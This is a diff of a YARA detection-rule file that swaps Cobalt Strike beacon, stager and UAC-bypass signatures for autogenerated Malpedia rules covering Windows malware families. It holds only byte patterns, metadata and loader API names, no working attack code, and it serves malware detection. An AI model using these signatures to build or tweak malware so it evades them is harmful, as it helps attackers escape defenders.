"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miniasp_auto.yar#L1-L129" + license_url = "N/A" + logic_hash = "9a4758ded83cb0970a2c1c85a01ff8f2f0263c333e1e2d45a290cc1db4a95dd4" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 D1 B3 FF FF - 8B D0 49 8B CA 48 83 C4 28 E9 AF F5 FF FF 45 33 C0 - 4C 8D 0D 8D 70 FF FF 8B D0 49 8B CA E8 9B B0 FF FF } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $sequence_0 = { 8b45c0 898550ffffff 8b8550ffffff 40 89854cffffff 8b8550ffffff } + $sequence_1 = { ff15???????? 85c0 751b c785c0fbffff10d84000 68???????? 8d85c0fbffff 50 } + $sequence_2 = { 8b4508 0345f0 0fbe4002 83f841 7c15 8b4508 } + $sequence_3 = { 747c 8b45f4 8945d8 8b45d8 40 8945d4 8b45d8 } + $sequence_4 = { 83a564ffffff00 eb0b 1bc0 83d8ff 898564ffffff } + $sequence_5 = { 6a00 ff75f8 e8???????? 83c40c 6804010000 6a00 } + $sequence_6 = { 68???????? 8d85c0fbffff 50 e8???????? b001 5f 5e } + $sequence_7 = { ff15???????? 85c0 7534 ff15???????? 3d882f0000 7427 ff75f8 } + $sequence_8 = { 0f8516010000 8b45ec 8b00 8b4dec ff5020 8945f4 837df400 } + $sequence_9 = { 8985ecfbffff 8b85ecfbffff 3b45fc 7728 6a01 68???????? 8b4508 } condition: - all of them + 7 of them and filesize <139264 } -rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_1_And_V_4_2 +rule MALPEDIA_Win_Badflick_Auto : FILE { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.1 and 4.2" - author = "gssincla@google.com" - id = "dc320d17-98fc-5df3-ba05-4d134129317e" - date = "2022-11-18" - modified = "2023-12-04" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1517-L1553" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "29ec171300e8d2dad2e1ca2b77912caf0d5f9d1b633a81bb6534acb20a1574b2" - logic_hash = "9b262ec18f79ab5ae63ad26d3685af088b5feb2d66de6ad3ba584cafbe2ee221" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "24a1778a-a3eb-561a-a408-849c5f96759c" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badflick_auto.yar#L1-L124" + license_url = "N/A" + logic_hash = "416482f46b00136f041d59b3fa9a5b2a608db531874355803fb74761c46fd686" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $version_sig = { 83 F9 34 0F 87 8E 03 00 00 0F 84 7A 03 00 00 83 F9 1C 0F 87 E6 01 00 00 - 0F 84 D7 01 00 00 83 F9 0E 0F 87 E9 00 00 00 0F 84 CE 00 00 00 FF C9 - 0F 84 B8 00 00 00 83 E9 02 0F 84 9F 00 00 00 FF C9 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $sequence_0 = { 74e2 6800800000 53 ff75f8 ff75e4 ff15???????? } + $sequence_1 = { 56 ff75fc ff15???????? 53 ff15???????? 33c0 5f } + $sequence_2 = { 8d4598 53 50 c7459044000000 895d94 e8???????? 33c0 } + $sequence_3 = { 8bec 51 51 8b4d0c 8b4101 53 56 } + $sequence_4 = { 68???????? 50 ffd7 be???????? 56 } + $sequence_5 = { 8945fc ffd6 8bf0 8d85e8fcffff 50 } + $sequence_6 = { 5d c3 b001 c3 55 8bec } + $sequence_7 = { 50 8b4704 03450c 50 8b47fc 0345f8 } + $sequence_8 = { 85c0 0f85e7000000 6a01 ff7305 } + $sequence_9 = { ff750c e8???????? 50 e8???????? 59 59 56 } condition: - all of them + 7 of them and filesize <81920 } -rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_3 +rule MALPEDIA_Win_Cabart_Auto : FILE { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Version 4.3" - author = "gssincla@google.com" - id = "572616c7-d1ec-5aa1-b142-4f2edf73737f" - date = "2022-11-18" - modified = "2023-12-04" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1555-L1590" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "3ac9c3525caa29981775bddec43d686c0e855271f23731c376ba48761c27fa3d" - logic_hash = "0c8934e997583339145749a3167ac010d8c77b2ed878d2c999de68ec2a98101d" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "ec8b7b53-684b-5fca-bc08-508467faa1aa" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cabart_auto.yar#L1-L118" + license_url = "N/A" + logic_hash = "ef91551af86c18985e4a8081f5258aef75a9aeccca976feccaee2997d09b19b6" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 D3 88 FF FF - 4C 8D 05 84 6E FF FF 8B D0 49 8B CA 48 83 C4 28 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $sequence_0 = { 8930 8b4510 eb16 395d10 740f } + $sequence_1 = { 8d8500fcffff 50 ff35???????? be00020000 ff35???????? } + $sequence_2 = { 3bc3 7620 8d4df0 51 50 } + $sequence_3 = { 33c0 66898506fcffff 8d8500fcffff 50 ff35???????? be00020000 } + $sequence_4 = { 8d0c30 3bcf 7732 3bc3 } + $sequence_5 = { 8d85fcfeffff 68???????? 6804010000 50 ff15???????? 83c410 6a10 } + $sequence_6 = { 85db 750a 68b90b0000 e8???????? 85ed } + $sequence_7 = { 3bc7 750a 68ec030000 e9???????? 8bc8 } + $sequence_8 = { 57 8d45e8 50 6a58 56 } + $sequence_9 = { ff15???????? 57 8d45f4 50 6a3f 56 c745f40a000000 } condition: - all of them + 7 of them and filesize <32768 } -rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_4_V_4_5_And_V4_6 +rule MALPEDIA_Win_Sneepy_Auto : FILE { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.4 through at least 4.6" - author = "gssincla@google.com" - id = "79b6bfd4-1e45-5bd9-ac5c-19eb176ce698" - date = "2022-11-18" - modified = "2023-12-04" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1593-L1628" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "3280fec57b7ca94fd2bdb5a4ea1c7e648f565ac077152c5a81469030ccf6ab44" - logic_hash = "be0bbf58a176f8089924b3ce58268d906f49dde51d863524971e46f4bada43a3" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "92a9a098-af3e-565a-a77d-ae1e4fe61438" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sneepy_auto.yar#L1-L117" + license_url = "N/A" + logic_hash = "0102a60e328cb3b8b2c7928ec4f988725df8b07a3b2131190567958f6bfcc033" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 83 88 FF FF - 4C 8D 05 A4 6D FF FF 8B D0 49 8B CA 48 83 C4 28 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $sequence_0 = { e8???????? 83c40c 33c0 8a8810234100 } + $sequence_1 = { 83f8ff 0f85abfeffff 5f 5e } + $sequence_2 = { 8945e4 8845e8 e8???????? 8d55e4 83c404 2bd0 8a08 } + $sequence_3 = { ffd6 85c0 740d 8b85b8feffff 50 ffd6 } + $sequence_4 = { e8???????? 83c40c 32c0 5e 8b4dfc } + $sequence_5 = { 68???????? 8945f4 8845f8 e8???????? 8d55f4 83c404 } + $sequence_6 = { ff15???????? 8bc8 8a10 40 } + $sequence_7 = { 33c0 8b4d08 3b0cc520de4000 740a 40 83f816 72ee } + $sequence_8 = { 668b0d???????? 8a15???????? 668908 6a50 } + $sequence_9 = { 33c0 8945e4 83f805 7d10 668b4c4310 66890c4514314100 } condition: - all of them + 7 of them and filesize <188416 } -rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_5_Variant +rule MALPEDIA_Win_Virdetdoor_Auto : FILE { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.5 (variant)" - author = "gssincla@google.com" - id = "45715da9-8f16-5304-b216-1ca36c508c77" - date = "2022-11-18" - modified = "2023-12-04" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1630-L1665" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "8f0da7a45945b630cd0dfb5661036e365dcdccd085bc6cff2abeec6f4c9f1035" - logic_hash = "31a108168489a24d1bc297d722741f3fd19abd1bed4c76d54967c73986d18123" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "888dbb4a-ac95-59fd-b6c6-805a13eab949" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.virdetdoor_auto.yar#L1-L123" + license_url = "N/A" + logic_hash = "f95b30ef178ddd53d43c681785d15b079df5f7a769adfe7338b74de03b97c177" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 E8 AB FF FF - 8B D0 49 8B CA E8 1A EB FF FF 48 83 C4 28 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $sequence_0 = { 8b93b0020000 2bc2 50 8b83ac020000 03c2 50 } + $sequence_1 = { 83ee01 753e 85ff 7524 390b 7720 3903 } + $sequence_2 = { 8d4dc0 e8???????? 85c0 0f84c8000000 } + $sequence_3 = { 83fe08 0f43c8 83c602 0fb7444dc0 0bd0 0fb7449dd2 0bd0 } + $sequence_4 = { 59 8d44240c 8bce 50 ff7314 57 e8???????? } + $sequence_5 = { 0fbfd0 8d8df8fdffff ff7508 50 } + $sequence_6 = { 55 8bec 51 51 53 8bc1 33db } + $sequence_7 = { ff75f0 8d8b50020000 e8???????? 834dfcff } + $sequence_8 = { 3c2e 7404 3c3a 750e 8a0437 88441dc0 43 } + $sequence_9 = { 8945f8 8b4508 8bf0 8975f0 8d5808 895df4 } condition: - all of them + 7 of them and filesize <106496 } -rule GCTI_Cobaltstrike_Resources_Bind64_Bin_V2_5_Through_V4_X +rule MALPEDIA_Win_Listrix_Auto : FILE { meta: - description = "Cobalt Strike's resources/bind64.bin signature for versions v2.5 to v4.x" - author = "gssincla@google.com" - id = "a01e7bc3-40e9-5f87-8fd6-926972be273b" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind64_Bin_v2_5_through_v4_x.yara#L17-L109" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "5dd136f5674f66363ea6463fd315e06690d6cb10e3cc516f2d378df63382955d" - logic_hash = "ba79abc5cfeaccb94699c0d85c16b2ddf6820bc148c0fd1c9b33c07222e36cb6" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "f00b612a-8ee6-5314-b10b-7290e9e1e604" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.listrix_auto.yar#L1-L121" + license_url = "N/A" + logic_hash = "2287c5f695d49f8318bd5f0c78a77cdf4d2c441f03bbfda75594fd76fd20827f" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $apiLocator = { - 48 [2] - AC - 41 [2] 0D - 41 [2] - 38 ?? - 75 ?? - 4C [4] - 45 [2] - 75 ?? - 5? - 44 [2] 24 - 49 [2] - 66 [4] - 44 [2] 1C - 49 [2] - 41 [3] - 48 - } - $calls = { - 41 BA C2 DB 37 67 - FF D5 - 48 [2] - 48 [2] - 41 BA B7 E9 38 FF - FF D5 - 4D [2] - 48 [2] - 48 [2] - 41 BA 74 EC 3B E1 - FF D5 - 48 [2] - 48 [2] - 41 BA 75 6E 4D 61 - } + $sequence_0 = { 8d8dc0f5ffff 51 ffd3 85c0 7454 57 } + $sequence_1 = { 85f6 740d f68594f5ffff10 0f84ac010000 8b1d???????? 68???????? 8d85c0f5ffff } + $sequence_2 = { 8d46ff 50 8b8584f5ffff 51 52 50 8d8df4fbffff } + $sequence_3 = { 8d85f4f7ffff 50 ff15???????? 8b7518 } + $sequence_4 = { 89b588f5ffff 397510 0f8e4c020000 57 8d85f4f7ffff 50 } + $sequence_5 = { 50 8d4c2470 51 c744242430794000 } + $sequence_6 = { c1e802 89442408 c744240c02000000 85c0 0f8408010000 } + $sequence_7 = { 8bc7 c1f805 c1e606 033485e0ad4000 8b45f8 8b00 } + $sequence_8 = { a1???????? c705????????cc274000 8935???????? a3???????? ff15???????? a3???????? } + $sequence_9 = { 6a00 8d95e4f9ffff 52 ff15???????? 85c0 0f84bb000000 } condition: - $apiLocator and $calls + 7 of them and filesize <106496 } -rule GCTI_Cobaltstrike_Resources_Template_Py_V3_3_To_V4_X +rule MALPEDIA_Win_Boatlaunch_Auto : FILE { meta: - description = "Cobalt Strike's resources/template.py signature for versions v3.3 to v4.x" - author = "gssincla@google.com" - id = "16aef9a9-b217-5462-93dc-f6273c99ddd0" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Py_v3_3_to_v4_x.yara#L17-L36" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "d5cb406bee013f51d876da44378c0a89b7b3b800d018527334ea0c5793ea4006" - logic_hash = "3c26cea4b8f2b200bf58e939ae9ead7a7339d4ec0de8c72b3d9c7da897600081" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "109242da-f9c2-50c8-b49d-1f772a8283fe" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boatlaunch" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.boatlaunch_auto.yar#L1-L169" + license_url = "N/A" + logic_hash = "efa924e2b3901352dc645d99e6dd6dafbe8ab78c7c6ccaefe300da9883a180c7" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $arch = "platform.architecture()" - $nope = "WindowsPE" - $alloc = "ctypes.windll.kernel32.VirtualAlloc" - $movemem = "ctypes.windll.kernel32.RtlMoveMemory" - $thread = "ctypes.windll.kernel32.CreateThread" - $wait = "ctypes.windll.kernel32.WaitForSingleObject" + $sequence_0 = { 4883611000 4883612800 488d4dd8 48c7c2ffff1f00 4c8d45e0 4c8d4d10 } + $sequence_1 = { e8???????? 8945e4 6a00 ff75e0 } + $sequence_2 = { 2b75ec 0375e4 8b4324 2b45ec 0345e4 } + $sequence_3 = { 488d4df0 e8???????? 48c7c1ffffffff 488d55f0 448bc3 e8???????? 3b8558110000 } + $sequence_4 = { 480375c8 8b4324 2b45c0 480345c8 488945d0 8b5b18 ad } + $sequence_5 = { 85f6 7599 488b0d???????? 33d2 4c8b4500 } + $sequence_6 = { 3b8560110000 7526 488b45d0 0fb730 } + $sequence_7 = { 488d4dd0 48c7c200001000 4c8d45e0 4c8d4d10 e8???????? 3d0b0000c0 7427 } + $sequence_8 = { 50 68ff0f1f00 8d45fc 50 } + $sequence_9 = { 8bfe 49 85c9 75ee } + $sequence_10 = { e8???????? 8bd8 85db 7452 53 } + $sequence_11 = { eb09 8345e802 4b 85db 75af } + $sequence_12 = { 50 e8???????? 3d0b0000c0 7423 6a00 ff75f8 e8???????? } + $sequence_13 = { 5b 5d c3 48894c2408 89542410 4489442418 } + $sequence_14 = { 488b45d8 488d6528 415b 415a 4159 4158 } + $sequence_15 = { 8d5ddc c70318000000 c7430400000000 c7430800000000 c7430c00000000 } condition: - all of them + 7 of them and filesize <33792 } -rule GCTI_Cobaltstrike_Resources_Httpstager64_Bin_V3_2_Through_V4_X +rule MALPEDIA_Win_Acidbox_Auto : FILE { meta: - description = "Cobalt Strike's resources/httpstager64.bin signature for versions v3.2 to v4.x" - author = "gssincla@google.com" - id = "5530dce8-e5a1-5133-9b05-464e3397084a" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpstager64_Bin_v3_2_through_v4_x.yara#L17-L85" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "ad93d1ee561bc25be4a96652942f698eac9b133d8b35ab7e7d3489a25f1d1e76" - logic_hash = "23666169565c6b3e5fa71767dc31096e7a25be049eeab16b074053d76c97c70b" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "d24270e3-4ecb-5df0-834e-54ac9b4880c3" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acidbox_auto.yar#L1-L127" + license_url = "N/A" + logic_hash = "7566f8c225df846294fd9c5a92e8c14928b074fdcd922768eae6047a40a5ef6e" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $apiLocator = { - 48 [2] - AC - 41 [2] 0D - 41 [2] - 38 ?? - 75 ?? - 4C [4] - 45 [2] - 75 ?? - 5? - 44 [2] 24 - 49 [2] - 66 [4] - 44 [2] 1C - 49 [2] - 41 [3] - 48 - } - $postInternetOpenJmp = { - 41 ?? 3A 56 79 A7 - FF ?? - EB - } + $sequence_0 = { 418bb590000000 4903f4 4889742438 413b8594000000 0f8311010000 397e0c 0f8408010000 } + $sequence_1 = { 4154 4155 4156 4157 4883ec28 4c8b7128 448b6108 } + $sequence_2 = { c780d8feffffd3731048 c780dcfeffffffff00ff c780e0feffffffe0cccc c780e4feffffffff0000 4d8920 4d8921 } + $sequence_3 = { 0fb6ca 4103c9 4403f0 0fb74562 41d3e0 418bc9 49ffc7 } + $sequence_4 = { ff15???????? 8d043e 898318170000 eb2f 8d8702010000 } + $sequence_5 = { 4883c438 c3 488bc4 48895810 48897018 57 4154 } + $sequence_6 = { eb09 4584c0 7908 418b4124 89442420 85c0 } + $sequence_7 = { 4c8b4de0 c70705000000 f7471000040000 0f840c010000 8b5f48 413bdd 410f47dd } + $sequence_8 = { 7d07 8bd7 413bc7 7d03 418bd1 8b4b28 488b4310 } + $sequence_9 = { 0fb79f02040000 418b8a14170000 418bc3 2bc3 } condition: - $apiLocator and $postInternetOpenJmp + 7 of them and filesize <589824 } -rule GCTI_Cobaltstrike_Resources_Artifact32Svc_Exe_V3_1_V3_2_V3_14_And_V4_X +rule MALPEDIA_Win_Fakeword_Auto : FILE { meta: - description = "Cobalt Strike's resources/artifact32svc(big).exe signature for versions 3.1 and 3.2 (with overlap with v3.14 through v4.x)" - author = "gssincla@google.com" - id = "732169be-e334-5774-b0ac-54b217a8b681" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32svc_Exe_v1_49_to_v4_x.yara#L53-L77" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "871390255156ce35221478c7837c52d926dfd581173818620b738b4b029e6fd9" - logic_hash = "b55211fc2dbe100edb19c3f3a000be513144e3556c4bce8a29a3c0b77451ba96" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "dff35d24-3d8a-5dd3-be0c-60e6ee2ac528" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fakeword_auto.yar#L1-L122" + license_url = "N/A" + logic_hash = "ba7599fef3200798ceac9b8a2a397ab651b3acac17ae30ecdd8eedb5f787592d" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 } + $sequence_0 = { 52 68???????? a3???????? 890d???????? c744240c10000000 c605????????11 c605????????22 } + $sequence_1 = { eb03 8b7de8 8d14b6 893d???????? } + $sequence_2 = { 7516 8b0a 8b6f34 25ff0f0000 03c3 03c1 } + $sequence_3 = { 6a00 6a10 8d7e14 56 6a04 } + $sequence_4 = { c684247603000031 754d 8d442454 8d8c2477030000 50 56 } + $sequence_5 = { 03c3 89442410 8b4804 85c9 750b 8b480c } + $sequence_6 = { 8b4701 8d4f09 8d743809 56 51 ff15???????? 83c408 } + $sequence_7 = { 8d1c02 3bd9 72f1 c6040f00 } + $sequence_8 = { b808000000 5e 83c440 c3 81fea1000000 7528 } + $sequence_9 = { 57 33c0 85d2 7e19 8bca 8bf3 8be9 } condition: - $decoderFunc + 7 of them and filesize <98304 } -rule GCTI_Cobaltstrike_Resources_Bypassuac_Dll_V1_49_To_V3_14_And_Sleeve_Bypassuac_Dll_V4_0_To_V4_X +rule MALPEDIA_Win_Sysjoker_Auto : FILE { meta: - description = "Cobalt Strike's resources/bypassuac(-x86).dll from v1.49 to v3.14 (32-bit version) and sleeve/bypassuac.dll from v4.0 to at least v4.4" - author = "gssincla@google.com" - id = "614046b5-cf81-56a5-8824-b3a7e14a8ed5" - date = "2022-11-18" - modified = "2022-11-19" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_Dll_v1_49_to_v3_14_and_Sleeve_Bypassuac_Dll_v4_0_to_v4_x.yara#L17-L94" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "91d12e1d09a642feedee5da966e1c15a2c5aea90c79ac796e267053e466df365" - logic_hash = "7d59c0286f1936e386519a919472d01581b68a8167c89bd3cd3108d45251119a" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "42bbdbb2-321a-5c06-b4e0-64934ffdbef1" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sysjoker_auto.yar#L1-L129" + license_url = "N/A" + logic_hash = "272a60e5cac852c8fc52dd28ee7d3d45f227ab0f82269e4ab7d14e4de95e70fb" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $deleteFileCOM = { - A1 [4] - 6A 00 - 8B ?? - 5? - 5? - FF ?? 48 - 85 ?? - 75 ?? - A1 [4] - 5? - 8B ?? - FF ?? 54 - } - $copyFileCOM = { - A1 [4] - 6A 00 - FF [2] - 8B ?? - FF [5] - FF [5] - 5? - FF ?? 40 - 85 ?? - [2 - 6] - A1 [4] - 5? - 8B ?? - FF ?? 54 - } + $sequence_0 = { 50 e8???????? 837de400 7416 } + $sequence_1 = { c746140f000000 c60600 e8???????? c7461060000000 8d4dd4 c746146f000000 0f1005???????? } + $sequence_2 = { ffd6 e9???????? 